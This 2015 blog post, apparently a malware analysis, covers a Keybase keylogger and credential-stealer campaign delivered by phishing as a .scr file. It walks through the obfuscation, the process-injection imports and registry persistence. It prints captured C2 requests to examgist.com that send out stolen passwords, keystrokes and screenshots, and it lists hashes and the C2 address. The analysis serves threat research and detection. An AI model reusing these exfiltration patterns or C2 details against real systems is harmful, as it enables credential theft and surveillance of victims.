1/6 Keybase Logger/Clipboard/CredsStealer campaign th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html While checking my email another day i came across a phish email that seemed quite suspicious. see below: https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html https://4.bp.blogspot.com/-wcpWBHiPwy4/VhwLNkuDG1I/AAAAAAAABjw/ZkAp5mSLFEY/s1600/iafO1qyO.png 2/6 It came with compressed file named Product_details.gz. when extracted; it presented a file named Payment_45476.scr. This file is windows executable which was .net compiled, The file was then opened with a tool called ILSPY in order to analyze its inner workings. - Looking at its main function it seems it created two threads: The function below looks to be using a primitive form of obfuscation that consist on reversing strings. Looking at the function below; the malware uses an Encryption class that handles the decryption of several strings found throughout the code see below. https://3.bp.blogspot.com/-gTkHUJQJVFY/VhwR8YRdTxI/AAAAAAAABkE/YnsZpm3zkPE/s1600/keybase-1.jpg https://2.bp.blogspot.com/-t6485E7wLfk/VhwUz3IsrRI/AAAAAAAABkQ/84SVz_5-mmo/s1600/keybase-2.jpg https://2.bp.blogspot.com/-1cl884WColM/VhwZdQBPEFI/AAAAAAAABkg/M9SVXf8JDYg/s1600/keybase-3.jpg 3/6 Looking at the function below, it seems it invokes the DecryptText function declared on the Encryption class. https://3.bp.blogspot.com/-JcKltzbnFEA/VhwZshMINwI/AAAAAAAABko/HMUk_KIq4aI/s1600/keybase-4.jpg https://2.bp.blogspot.com/-y3_QB87rtIg/VhwZ-MCzhAI/AAAAAAAABkw/J7gxmxLH8u8/s1600/keybase-5.jpg 4/6 The decoded data corresponds the imports the malware will be using: CreateProcessA GetThreadContext SetThreadContext Wow64SetThreadContext ReadProcessMemory WriteProcessMemory NtUnmapViewOfSection VirtualAllocEx ResumeThread When this sample was executed it was clear the sample had malicious intents.It established persistence by copying itself to the startup folder and setting the autorun registry key at startup. The malware names itself "Important.exe" which on looking at the code it seems a static value set by the author. see below for registry and file activity. [CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe [MD5: 7c6a2697df26582b438c21ee7ce5b0b1] [RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe The malware then starts to reach out to its c2. The requests indicate the malware has the following capabilities: Takes a screenshot of the current working window Acts as a keylogger and credential stealer. Captures clipboard content. GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM HTTP/1.1 "steals passwords from chrome password cache" GET /wp-includes/css/keybase/post.php? type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru- ru/user&username=polloloco&password=zi25XgKY HTTP/1.1 "it has keylogging capabilities" GET /wp-includes/css/keybase/post.php? type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM HTTP/1.1 POST /wp-includes/css/keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930 Host: examgist.com On looking further to the c2 callbacks, it was noticed the locations in which the screenshots were shared was world readable. See sample below: https://4.bp.blogspot.com/-cTpltXl8aEA/Vhw2btdxsKI/AAAAAAAABlk/5GkP86I3cFY/s1600/keybase-6.jpg 5/6 The login panel was also available : In conclusion ,this malware is considered primitive based on its design. however, it can certainly cause damage its kelogging, screen sharing and credential stealing capabilities make it very attractive to skiddies. thank you for reading MD5: 7c6a2697df26582b438c21ee7ce5b0b1 Payment_45476.scr 398af2fd86ce37d6d3052eb7503b2790 Order_25464.scr 78c4256eb2003db620a45adba44f404c Order_34002.gz 9dada7b67f5066e6f5d394222240beb9 Product_details.gz C2: http://examgist[.]com/wp-includes/css/keybase/login.php https://2.bp.blogspot.com/-xFNYP1Oqveo/VhxC4K1H3oI/AAAAAAAABl4/WbpvvZ3qEJg/s1600/keybase-7.jpg https://2.bp.blogspot.com/-IMM6fVpmlWc/VhyGqixcUWI/AAAAAAAABmg/QF27aQ2SmUw/s1600/keybase-8.jpg 6/6 VT: https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/